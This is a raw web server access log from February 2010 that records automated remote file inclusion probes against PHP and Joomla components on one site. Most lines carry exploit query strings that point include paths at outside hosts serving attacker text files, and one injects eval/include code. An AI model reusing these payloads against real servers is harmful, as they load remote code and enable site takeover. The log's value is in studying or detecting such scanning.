74.205.120.218 - - [15/Feb/2010:08:06:54 -0800] "GET /logs/access_100104.log%20%20///////components/com_simpleboard/image_upload.php?sbp=http://www.difusion.com.mx/components/com_web/components/com_newsfeeds/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
203.124.149.168 - - [15/Feb/2010:08:07:05 -0800] "GET /skin_shop/standard/2_view_body/body_default.php?GOODS[no]=deadbeef&GOODS[gs_input]=deadbeef&shop_this_skin_path=http://www.gruppoanima.it/gruppoanima/templates/ja_purity/id1.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
203.124.149.168 - - [15/Feb/2010:08:07:05 -0800] "GET /logs/access_100115.log%20%20//skin_shop/standard/2_view_body/body_default.php?GOODS[no]=deadbeef&GOODS[gs_input]=deadbeef&shop_this_skin_path=http://www.gruppoanima.it/gruppoanima/templates/ja_purity/id1.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
203.124.149.168 - - [15/Feb/2010:08:07:05 -0800] "GET /logs//skin_shop/standard/2_view_body/body_default.php?GOODS[no]=deadbeef&GOODS[gs_input]=deadbeef&shop_this_skin_path=http://www.gruppoanima.it/gruppoanima/templates/ja_purity/id1.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
210.205.6.233 - - [15/Feb/2010:08:07:09 -0800] "GET /logs/access.log%20%20//////?_SERVER[DOCUMENT_ROOT]=http://zerozon.co.kr/photos/count/id1.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
210.205.6.233 - - [15/Feb/2010:08:07:09 -0800] "GET /logs//////?_SERVER[DOCUMENT_ROOT]=http://zerozon.co.kr/photos/count/id1.txt??? HTTP/1.1" 200 4951 "-" "Mozilla/5.0" "www.puaga.com"
210.205.6.233 - - [15/Feb/2010:08:07:09 -0800] "GET /////?_SERVER[DOCUMENT_ROOT]=http://zerozon.co.kr/photos/count/id1.txt??? HTTP/1.1" 200 3642 "-" "Mozilla/5.0" "www.puaga.com"
203.124.149.168 - - [15/Feb/2010:08:07:11 -0800] "GET /logs/access_100109.log%20%20//lib/adodb_lite/adodb-perf-module.inc.php?last_module=zZz_ADOConnection%7B%7Deval($_GET[w]);class%20zZz_ADOConnection%7B%7D//&w=include($_GET[a]);&a=http://www.gruppoanima.it/gruppoanima/templates/ja_purity/id1.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
91.207.6.18 - - [15/Feb/2010:08:07:18 -0800] "GET /index.php?option=com_content&task=§ionid=&id=&mosConfig_absolute_path=http://test.bigshop.cz/uploaded/two?? HTTP/1.1" 200 3642 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.7.12) Gecko/20050915 Firefox/1.0.7" "www.puaga.com"
91.207.6.18 - - [15/Feb/2010:08:07:18 -0800] "GET /logs/index.php?option=com_content&task=§ionid=&id=&mosConfig_absolute_path=http://test.bigshop.cz/uploaded/two?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.7.12) Gecko/20050915 Firefox/1.0.7" "www.puaga.com"
74.205.120.218 - - [15/Feb/2010:08:08:59 -0800] "GET /logs/access_100103.log///////components/com_simpleboard/image_upload.php?sbp=http://www.difusion.com.mx/components/com_web/components/com_newsfeeds/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
91.207.6.18 - - [15/Feb/2010:08:09:31 -0800] "GET /phphtml.php?htmlclass_path=http://test.bigshop.cz/uploaded/two?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.7.12) Gecko/20050915 Firefox/1.0.7" "www.puaga.com"
91.207.6.18 - - [15/Feb/2010:08:09:31 -0800] "GET /logs/phphtml.php?htmlclass_path=http://test.bigshop.cz/uploaded/two?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.7.12) Gecko/20050915 Firefox/1.0.7" "www.puaga.com"
91.207.6.18 - - [15/Feb/2010:08:10:04 -0800] "GET /logs/?custompluginfile[]=http://test.bigshop.cz/uploaded/two?? HTTP/1.1" 200 4942 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8b4) Gecko/20050908 Firefox/1.4" "www.puaga.com"
91.207.6.18 - - [15/Feb/2010:08:10:05 -0800] "GET /?custompluginfile[]=http://test.bigshop.cz/uploaded/two?? HTTP/1.1" 200 3642 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8b4) Gecko/20050908 Firefox/1.4" "www.puaga.com"
188.61.181.34 - - [15/Feb/2010:08:10:33 -0800] "GET /logs/access_100201.log//kboard.php?board=notice&act=write&no=3&page=&cid=&mode=reply&act=http://musicadelibreria.net/footer?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
24.207.120.69 - - [15/Feb/2010:08:11:03 -0800] "GET /errors.php?error=http://www.infotecknet.com.br/site/id??? HTTP/1.1" 404 5258 "-" "libwww-perl/5.831" "www.puaga.com"
91.207.6.18 - - [15/Feb/2010:08:11:29 -0800] "GET /logs/?custompluginfile[]=http://test.bigshop.cz/uploaded/two?? HTTP/1.1" 200 4942 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.7.12) Gecko/20050915 Firefox/1.0.7" "www.puaga.com"
91.207.6.18 - - [15/Feb/2010:08:11:29 -0800] "GET /?custompluginfile[]=http://test.bigshop.cz/uploaded/two?? HTTP/1.1" 200 3642 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.7.12) Gecko/20050915 Firefox/1.0.7" "www.puaga.com"
24.207.120.69 - - [15/Feb/2010:08:12:49 -0800] "GET /errors.php?error=http://www.infotecknet.com.br/site/id??? HTTP/1.1" 404 5258 "-" "libwww-perl/5.831" "www.puaga.com"
213.239.230.130 - - [15/Feb/2010:08:14:04 -0800] "GET /logs///index.php?option=com_frontpage&Itemid=&mosConfig.absolute.path=http://www.solutionexchange-un.net.in/en//media/test.txt???? HTTP/1.1" 404 5258 "-" "Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.7.9) Gecko/20050711 Firefox/1.0.5" "www.puaga.com"
213.239.230.130 - - [15/Feb/2010:08:14:04 -0800] "GET //index.php?option=com_frontpage&Itemid=&mosConfig.absolute.path=http://www.solutionexchange-un.net.in/en//media/test.txt???? HTTP/1.1" 200 3642 "-" "Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.7.9) Gecko/20050711 Firefox/1.0.5" "www.puaga.com"
222.231.24.246 - - [15/Feb/2010:08:14:08 -0800] "GET /logs/access_100115.log/administrator/components/com_jcs/jcs.function.php?mosConfig_absolute_path=http://fritjazz.com/administrator/images/fx29id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
222.231.24.246 - - [15/Feb/2010:08:14:08 -0800] "GET /logs/administrator/components/com_jcs/jcs.function.php?mosConfig_absolute_path=http://fritjazz.com/administrator/images/fx29id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
222.231.24.246 - - [15/Feb/2010:08:14:08 -0800] "GET /administrator/components/com_jcs/jcs.function.php?mosConfig_absolute_path=http://fritjazz.com/administrator/images/fx29id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
222.231.24.246 - - [15/Feb/2010:08:14:24 -0800] "GET /administrator/components/com_jcs/jcs.function.php?mosConfig.absolute_path=http://fritjazz.com/administrator/images/fx29id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
222.231.24.246 - - [15/Feb/2010:08:14:24 -0800] "GET /logs/access_100115.log/administrator/components/com_jcs/jcs.function.php?mosConfig.absolute_path=http://fritjazz.com/administrator/images/fx29id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
222.231.24.246 - - [15/Feb/2010:08:14:24 -0800] "GET /logs/administrator/components/com_jcs/jcs.function.php?mosConfig.absolute_path=http://fritjazz.com/administrator/images/fx29id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
91.207.6.18 - - [15/Feb/2010:08:14:35 -0800] "GET /lib/adodb_lite/adodb-perf-module.inc.php?last_module=zZz_ADOConnection%7B%7Deval($_GET[w]);class%20zZz_ADOConnection%7B%7D//&w=include($_GET[a]);&a=http://test.bigshop.cz/uploaded/two?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8b4) Gecko/20050908 Firefox/1.4" "www.puaga.com"
91.207.6.18 - - [15/Feb/2010:08:14:35 -0800] "GET /logs/lib/adodb_lite/adodb-perf-module.inc.php?last_module=zZz_ADOConnection%7B%7Deval($_GET[w]);class%20zZz_ADOConnection%7B%7D//&w=include($_GET[a]);&a=http://test.bigshop.cz/uploaded/two?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8b4) Gecko/20050908 Firefox/1.4" "www.puaga.com"
200.85.1.152 - - [15/Feb/2010:08:15:22 -0800] "GET /logs/access_100111.log%20%20//index.php?option=com_bayesiannaivefilter&Itemid=&mosConfig_absolute_path=http://musicadelibreria.net/footer??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
200.85.1.152 - - [15/Feb/2010:08:15:22 -0800] "GET /logs//index.php?option=com_bayesiannaivefilter&Itemid=&mosConfig_absolute_path=http://musicadelibreria.net/footer??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
200.85.1.152 - - [15/Feb/2010:08:15:22 -0800] "GET /index.php?option=com_bayesiannaivefilter&Itemid=&mosConfig_absolute_path=http://musicadelibreria.net/footer??? HTTP/1.1" 200 3642 "-" "Mozilla/5.0" "www.puaga.com"
200.85.1.152 - - [15/Feb/2010:08:15:34 -0800] "GET /logs/access_100122.log%20%20//index.php?option=com_bayesiannaivefilter&Itemid=&mosConfig_absolute_path=http://musicadelibreria.net/footer??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
74.222.4.218 - - [15/Feb/2010:08:15:51 -0800] "GET /robots.txt HTTP/1.0" 200 36 "http://www.puaga.com/robots.txt" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727)" "www.puaga.com"
74.222.4.218 - - [15/Feb/2010:08:15:51 -0800] "GET / HTTP/1.0" 200 3626 "http://www.puaga.com/" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727)" "www.puaga.com"
222.231.24.246 - - [15/Feb/2010:08:15:52 -0800] "GET /administrator/components/com_jcs/jcs.function.php?mosConfig.absolute_path=http://fritjazz.com/administrator/images/fx29id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
222.231.24.246 - - [15/Feb/2010:08:15:52 -0800] "GET /logs/administrator/components/com_jcs/jcs.function.php?mosConfig.absolute_path=http://fritjazz.com/administrator/images/fx29id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
222.231.24.246 - - [15/Feb/2010:08:15:52 -0800] "GET /logs/access_100115.log%20%20/administrator/components/com_jcs/jcs.function.php?mosConfig.absolute_path=http://fritjazz.com/administrator/images/fx29id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
74.222.4.218 - - [15/Feb/2010:08:16:00 -0800] "GET /robots.txt HTTP/1.0" 200 36 "http://www.puaga.com/robots.txt" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727)" "www.puaga.com"
74.222.4.218 - - [15/Feb/2010:08:16:01 -0800] "GET /style/imagehover.js HTTP/1.0" 200 1410 "http://www.puaga.com/style/imagehover.js" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727)" "www.puaga.com"
222.231.24.246 - - [15/Feb/2010:08:16:11 -0800] "GET /administrator/components/com_chronocontact/excelwriter/Writer/BIFFwriter.php?mosConfig_absolute_path=http://fritjazz.com/administrator/images/fx29id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
222.231.24.246 - - [15/Feb/2010:08:16:11 -0800] "GET /logs/access_100121.log/administrator/components/com_chronocontact/excelwriter/Writer/BIFFwriter.php?mosConfig_absolute_path=http://fritjazz.com/administrator/images/fx29id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
222.231.24.246 - - [15/Feb/2010:08:16:11 -0800] "GET /logs/administrator/components/com_chronocontact/excelwriter/Writer/BIFFwriter.php?mosConfig_absolute_path=http://fritjazz.com/administrator/images/fx29id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
222.231.24.246 - - [15/Feb/2010:08:16:20 -0800] "GET /logs/access_100115.log%20%20/administrator/components/com_jcs/jcs.function.php?mosConfig_absolute_path=http://fritjazz.com/administrator/images/fx29id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
222.231.24.246 - - [15/Feb/2010:08:16:20 -0800] "GET /logs/administrator/components/com_jcs/jcs.function.php?mosConfig_absolute_path=http://fritjazz.com/administrator/images/fx29id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
222.231.24.246 - - [15/Feb/2010:08:16:20 -0800] "GET /administrator/components/com_jcs/jcs.function.php?mosConfig_absolute_path=http://fritjazz.com/administrator/images/fx29id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
80.172.236.41 - - [15/Feb/2010:08:17:12 -0800] "GET /logs/access_100112.log//skin/uks_gallery_v3010/write.php?dir=http://qqe.ru/forum/Smileys/id2.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
189.6.218.57 - - [15/Feb/2010:08:17:31 -0800] "GET /logs/access_100129.log/delete_all.php?board_skin_path=http://www.perikritis.gr/phpBB2/admin/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
189.6.218.57 - - [15/Feb/2010:08:17:31 -0800] "GET /logs/access_100202.log/delete_all.php?board_skin_path=http://www.perikritis.gr/phpBB2/admin/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
189.6.218.57 - - [15/Feb/2010:08:17:31 -0800] "GET /logs/delete_all.php?board_skin_path=http://www.perikritis.gr/phpBB2/admin/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
189.6.218.57 - - [15/Feb/2010:08:17:31 -0800] "GET /delete_all.php?board_skin_path=http://www.perikritis.gr/phpBB2/admin/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
222.231.24.246 - - [15/Feb/2010:08:17:35 -0800] "GET /logs/access_100123.log%20%20/administrator/components/com_jcs/jcs.function.php?mosConfig.absolute_path=http://fritjazz.com/administrator/images/fx29id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
80.172.236.41 - - [15/Feb/2010:08:17:46 -0800] "GET /logs/access_100112.log//skin/uks_gallery_v3010/write.php?dir=http://qqe.ru/forum/Smileys/id2.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
222.231.24.246 - - [15/Feb/2010:08:18:02 -0800] "GET /logs/access_100123.log%20%20/administrator/components/com_jcs/jcs.function.php?mosConfig_absolute_path=http://fritjazz.com/administrator/images/fx29id1.txt?? HTTP/1.0" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
213.251.189.201 - - [15/Feb/2010:08:19:53 -0800] "GET /games/dcfrpg/?sourcedir=http://kuwok.110mb.com/fx29id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
213.251.189.201 - - [15/Feb/2010:08:19:53 -0800] "GET /logs//games/dcfrpg/?sourcedir=http://kuwok.110mb.com/fx29id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
213.251.189.201 - - [15/Feb/2010:08:19:53 -0800] "GET /logs/access_100114.log%20%20//games/dcfrpg/?sourcedir=http://kuwok.110mb.com/fx29id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
24.207.120.69 - - [15/Feb/2010:08:19:56 -0800] "GET /logs/access_100207.log/errors.php?error=http://www.infotecknet.com.br/site/id??? HTTP/1.1" 404 5258 "-" "libwww-perl/5.831" "www.puaga.com"
24.207.120.69 - - [15/Feb/2010:08:19:57 -0800] "GET /errors.php?error=http://www.infotecknet.com.br/site/id??? HTTP/1.1" 404 5258 "-" "libwww-perl/5.831" "www.puaga.com"
24.207.120.69 - - [15/Feb/2010:08:19:57 -0800] "GET /logs/errors.php?error=http://www.infotecknet.com.br/site/id??? HTTP/1.1" 404 5258 "-" "libwww-perl/5.831" "www.puaga.com"
213.251.189.201 - - [15/Feb/2010:08:20:12 -0800] "GET /logs//games/dcfrpg/?sourcedir=http://kuwok.110mb.com/fx29id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
213.251.189.201 - - [15/Feb/2010:08:20:12 -0800] "GET /games/dcfrpg/?sourcedir=http://kuwok.110mb.com/fx29id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
213.251.189.201 - - [15/Feb/2010:08:20:12 -0800] "GET /logs/access_100114.log%20%20//games/dcfrpg/?sourcedir=http://kuwok.110mb.com/fx29id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
222.231.24.246 - - [15/Feb/2010:08:21:08 -0800] "GET /logs/access_100124.log%20%20/administrator/components/com_chronocontact/excelwriter/Writer/BIFFwriter.php?mosConfig_absolute_path=http://fritjazz.com/administrator/images/fx29id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
222.231.24.246 - - [15/Feb/2010:08:21:08 -0800] "GET /logs/administrator/components/com_chronocontact/excelwriter/Writer/BIFFwriter.php?mosConfig_absolute_path=http://fritjazz.com/administrator/images/fx29id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
222.231.24.246 - - [15/Feb/2010:08:21:08 -0800] "GET /administrator/components/com_chronocontact/excelwriter/Writer/BIFFwriter.php?mosConfig_absolute_path=http://fritjazz.com/administrator/images/fx29id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
82.151.132.176 - - [15/Feb/2010:08:21:09 -0800] "GET /logs/access_100121.log%20%20//bbs/write_update.php?board_skin_path=http://landfleischerei-zeise.de//administrator/components/com_virtuemart/Oid1.txt???? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
200.85.1.152 - - [15/Feb/2010:08:21:37 -0800] "GET /logs/access_100111.log//index.php?option=com_bayesiannaivefilter&Itemid=&mosConfig_absolute_path=http://musicadelibreria.net/footer??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
200.85.1.152 - - [15/Feb/2010:08:21:48 -0800] "GET /logs/access_100107.log//index.php?option=com_bayesiannaivefilter&Itemid=&mosConfig_absolute_path=http://musicadelibreria.net/footer??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
80.172.236.41 - - [15/Feb/2010:08:22:31 -0800] "GET /logs//bbs//delete_comment.php?board_skin_path=http://qqe.ru/forum/Smileys/id2.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
80.172.236.41 - - [15/Feb/2010:08:22:31 -0800] "GET /bbs//delete_comment.php?board_skin_path=http://qqe.ru/forum/Smileys/id2.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
80.172.236.41 - - [15/Feb/2010:08:22:31 -0800] "GET /logs/access_100202.log%20%20//bbs//delete_comment.php?board_skin_path=http://qqe.ru/forum/Smileys/id2.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
80.172.236.41 - - [15/Feb/2010:08:22:48 -0800] "GET /logs/access_100128.log%20%20//bbs//delete_comment.php?board_skin_path=http://qqe.ru/forum/Smileys/id2.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
82.151.132.176 - - [15/Feb/2010:08:24:03 -0800] "GET /write_update.head.skin.php?board_skin_path=http://landfleischerei-zeise.de//administrator/components/com_virtuemart/Oid1.txt???? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
82.151.132.176 - - [15/Feb/2010:08:24:03 -0800] "GET /logs//write_update.head.skin.php?board_skin_path=http://landfleischerei-zeise.de//administrator/components/com_virtuemart/Oid1.txt???? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
61.111.3.35 - - [15/Feb/2010:08:24:03 -0800] "GET /logs/access_100210.log/write_comment_update.php?board_skin_path=http://tkosin.onmam.com/data/doc.txt???? HTTP/1.1" 404 5258 "-" "Mozilla/5.0 (Macintosh; U; PPC Mac OS X Mach-O; en-US; rv:1.7.12) Gecko/20050915 Firefox/1.0.7" "www.puaga.com"
61.111.3.35 - - [15/Feb/2010:08:24:04 -0800] "GET /write_comment_update.php?board_skin_path=http://tkosin.onmam.com/data/doc.txt???? HTTP/1.1" 404 5258 "-" "Mozilla/5.0 (Macintosh; U; PPC Mac OS X Mach-O; en-US; rv:1.7.12) Gecko/20050915 Firefox/1.0.7" "www.puaga.com"
61.111.3.35 - - [15/Feb/2010:08:24:04 -0800] "GET /logs/write_comment_update.php?board_skin_path=http://tkosin.onmam.com/data/doc.txt???? HTTP/1.1" 404 5258 "-" "Mozilla/5.0 (Macintosh; U; PPC Mac OS X Mach-O; en-US; rv:1.7.12) Gecko/20050915 Firefox/1.0.7" "www.puaga.com"
82.151.132.176 - - [15/Feb/2010:08:24:05 -0800] "GET /logs/access.log%20%20//write_update.head.skin.php?board_skin_path=http://landfleischerei-zeise.de//administrator/components/com_virtuemart/Oid1.txt???? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
61.111.3.35 - - [15/Feb/2010:08:24:07 -0800] "GET /logs/access.log/write_comment_update.php?board_skin_path=http://tkosin.onmam.com/data/doc.txt???? HTTP/1.1" 404 5258 "-" "Mozilla/5.0 (Macintosh; U; PPC Mac OS X Mach-O; en-US; rv:1.7.12) Gecko/20050915 Firefox/1.0.7" "www.puaga.com"
61.111.3.35 - - [15/Feb/2010:08:24:25 -0800] "GET /logs/access_100202.log/write_comment_update.php?board_skin_path=http://tkosin.onmam.com/data/doc.txt???? HTTP/1.1" 404 5258 "-" "Mozilla/5.0 (Macintosh; U; PPC Mac OS X Mach-O; en-US; rv:1.7.12) Gecko/20050915 Firefox/1.0.7" "www.puaga.com"
203.124.149.168 - - [15/Feb/2010:08:26:13 -0800] "GET /logs/access_100126.log%20%20//skin_shop/standard/2_view_body/body_default.php?GOODS[no]=deadbeef&GOODS[gs_input]=deadbeef&shop_this_skin_path=http://www.gruppoanima.it/gruppoanima/templates/ja_purity/id1.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
82.151.132.176 - - [15/Feb/2010:08:26:49 -0800] "GET /logs/access_100121.log%20%20//bbs/write_update.php?board_skin_path=http://landfleischerei-zeise.de//administrator/components/com_virtuemart/Oid1.txt???? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
81.174.65.27 - - [15/Feb/2010:08:27:50 -0800] "GET /logs/access_100111.log/akocomments.php?mosConfig_absolute_path=http://www.eywestco.co.kr/upfiles/README.txt? HTTP/1.1" 404 5258 "-" "libwww-perl/5.831" "www.puaga.com"
81.174.65.27 - - [15/Feb/2010:08:27:51 -0800] "GET /logs/akocomments.php?mosConfig_absolute_path=http://www.eywestco.co.kr/upfiles/README.txt? HTTP/1.1" 404 5258 "-" "libwww-perl/5.831" "www.puaga.com"
211.233.89.196 - - [15/Feb/2010:08:27:59 -0800] "GET /logs/access_100117.log%20%20//index.php?option=com_bayesiannaivefilter&Itemid=&mosConfig_absolute_path=http://www.qqe.ru/forum//attachments/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
211.233.89.196 - - [15/Feb/2010:08:28:09 -0800] "GET /logs/access_100107.log%20%20//index.php?option=com_bayesiannaivefilter&Itemid=&mosConfig_absolute_path=http://www.qqe.ru/forum//attachments/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
81.174.65.27 - - [15/Feb/2010:08:28:29 -0800] "GET /logs/access_100125.log/akocomments.php?mosConfig_absolute_path=http://www.eywestco.co.kr/upfiles/README.txt? HTTP/1.1" 404 5258 "-" "libwww-perl/5.831" "www.puaga.com"
213.251.189.201 - - [15/Feb/2010:08:28:35 -0800] "GET //index.php?option=com_bayesiannaivefilter&Itemid=&mosConfig_absolute_path=http://musicadelibreria.net/footer?? HTTP/1.1" 200 3642 "-" "Mozilla/5.0" "www.puaga.com"
213.251.189.201 - - [15/Feb/2010:08:28:46 -0800] "GET /logs/access_100111.log%20%20///index.php?option=com_bayesiannaivefilter&Itemid=&mosConfig_absolute_path=http://musicadelibreria.net/footer?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
213.251.189.201 - - [15/Feb/2010:08:28:46 -0800] "GET /logs///index.php?option=com_bayesiannaivefilter&Itemid=&mosConfig_absolute_path=http://musicadelibreria.net/footer?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
213.251.189.201 - - [15/Feb/2010:08:28:46 -0800] "GET //index.php?option=com_bayesiannaivefilter&Itemid=&mosConfig_absolute_path=http://musicadelibreria.net/footer?? HTTP/1.1" 200 3642 "-" "Mozilla/5.0" "www.puaga.com"
213.251.189.201 - - [15/Feb/2010:08:28:47 -0800] "GET /logs///index.php?option=com_bayesiannaivefilter&Itemid=&mosConfig_absolute_path=http://musicadelibreria.net/footer?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
213.251.189.201 - - [15/Feb/2010:08:28:47 -0800] "GET /logs/access_100111.log///index.php?option=com_bayesiannaivefilter&Itemid=&mosConfig_absolute_path=http://musicadelibreria.net/footer?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
213.251.189.201 - - [15/Feb/2010:08:28:47 -0800] "GET //index.php?option=com_bayesiannaivefilter&Itemid=&mosConfig_absolute_path=http://musicadelibreria.net/footer?? HTTP/1.1" 200 3642 "-" "Mozilla/5.0" "www.puaga.com"
64.202.102.218 - - [15/Feb/2010:08:28:59 -0800] "GET /logs/access_100207.log//components/com_remository/admin.remository.php?mosConfig.absolute.path=http://www.diamondhitech.com/bbs/icon/private_icon/com/sc1? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
64.202.102.218 - - [15/Feb/2010:08:28:59 -0800] "GET /components/com_remository/admin.remository.php?mosConfig.absolute.path=http://www.diamondhitech.com/bbs/icon/private_icon/com/sc1? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
58.150.99.144 - - [15/Feb/2010:08:29:01 -0800] "GET /logs///index.php?option=com_bayesiannaivefilter&Itemid=&mosConfig_absolute_path=http://musicadelibreria.net/footer?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
58.150.99.144 - - [15/Feb/2010:08:29:01 -0800] "GET /logs/access_100107.log%20%20///index.php?option=com_bayesiannaivefilter&Itemid=&mosConfig_absolute_path=http://musicadelibreria.net/footer?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
58.150.99.144 - - [15/Feb/2010:08:29:01 -0800] "GET //index.php?option=com_bayesiannaivefilter&Itemid=&mosConfig_absolute_path=http://musicadelibreria.net/footer?? HTTP/1.1" 200 3642 "-" "Mozilla/5.0" "www.puaga.com"
64.202.102.218 - - [15/Feb/2010:08:29:32 -0800] "GET /logs/access_100210.log//components/com_remository/admin.remository.php?mosConfig.absolute.path=http://www.diamondhitech.com/bbs/icon/private_icon/com/sc1? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
64.202.102.218 - - [15/Feb/2010:08:29:33 -0800] "GET /logs/access_100210.log//components/com_remository/admin.remository.php?mosConfig.absolute.path=http://www.diamondhitech.com/bbs/icon/private_icon/com/sc1? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
213.251.189.201 - - [15/Feb/2010:08:29:36 -0800] "GET /logs/access_100107.log///index.php?option=com_bayesiannaivefilter&Itemid=&mosConfig_absolute_path=http://musicadelibreria.net/footer?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
213.251.189.201 - - [15/Feb/2010:08:29:43 -0800] "GET /logs/access_100107.log///index.php?option=com_bayesiannaivefilter&Itemid=&mosConfig_absolute_path=http://musicadelibreria.net/footer?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
66.249.65.102 - - [15/Feb/2010:08:30:48 -0800] "GET /atesh_info/nt.php?t=3053836447 HTTP/1.1" 200 61 "-" "Googlebot-Image/1.0" "www.atesh.info"
